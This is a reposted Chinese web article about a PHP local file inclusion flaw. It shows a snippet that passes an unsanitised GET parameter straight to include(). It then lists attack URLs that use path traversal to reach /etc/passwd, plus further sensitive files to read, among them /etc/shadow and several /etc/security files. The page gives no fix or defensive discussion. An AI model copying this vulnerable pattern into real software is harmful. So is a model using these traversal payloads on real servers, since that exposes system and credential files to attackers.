php 伪造本地文件包含漏洞的代码

PHP 2014-12-06 04:06:04 转载来源: 网络整理/侵权必删

本文是一个php 伪造本地文件包含漏洞的代码示例，感兴趣的同学参考下。代码: <?php $page=$_GET['page']; include($page.'php'); ?> 你可以这样使用 http://www.xxx.com/index.php?page=../etc/passwd http://www.xxx.com/index.php?page=../../../etc/passwd http://www.xxx.com/index.php?page=..../../etc/passwd 获取更多数据: etc/profile etc/services /etc/passwd /etc/shadow /etc/group /etc/security/group /etc/security/passwd /etc/security/user /etc/security/environ /etc/security/limits /usr/lib/security

本文是一个php 伪造本地文件包含漏洞的代码示例，感兴趣的同学参考下。

代码:

<?php

$page=$_GET['page'];

include($page.'php');

?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

标签: php 伪造本地文件包含漏洞代码

声明：本文内容来源自网络，文字、图片等素材版权属于原作者，平台转载素材出于传递更多信息，文章内容仅供参考与学习，切勿作为商业目的使用。如果侵害了您的合法权益，请您及时与我们联系，我们会在第一时间进行处理！我们尊重版权，也致力于保护版权，站搜网感谢您的分享！

上一篇: 教你怎样Office2010用文档导航窗格控制结构

上一篇: 中国概念股周五早盘涨跌互现淘米网跌10%

娱乐休闲

工商与经济

电脑与网络

公司与企业

教育与培训

文学

艺术

体育与健身

新闻与媒体

卫生与健康

科学/文化

生活与服务

手机短信

图书/书店

冰雪运动

公司企业

特色旅游

拍卖

足球

国际组织

会展活动

国外公司企业

自助旅游

聊天/BBS

php 伪造本地文件包含漏洞的代码

热门文章

热点

标签列表

分享到:

Copyright @ 2007~2024 All Rights Reserved.

Powered By 站长搜索

php 伪造本地文件包含漏洞的代码

猜您喜欢

热门文章

热点

标签列表

分享到:

Copyright @ 2007~2024 All Rights Reserved.

Powered By 站长搜索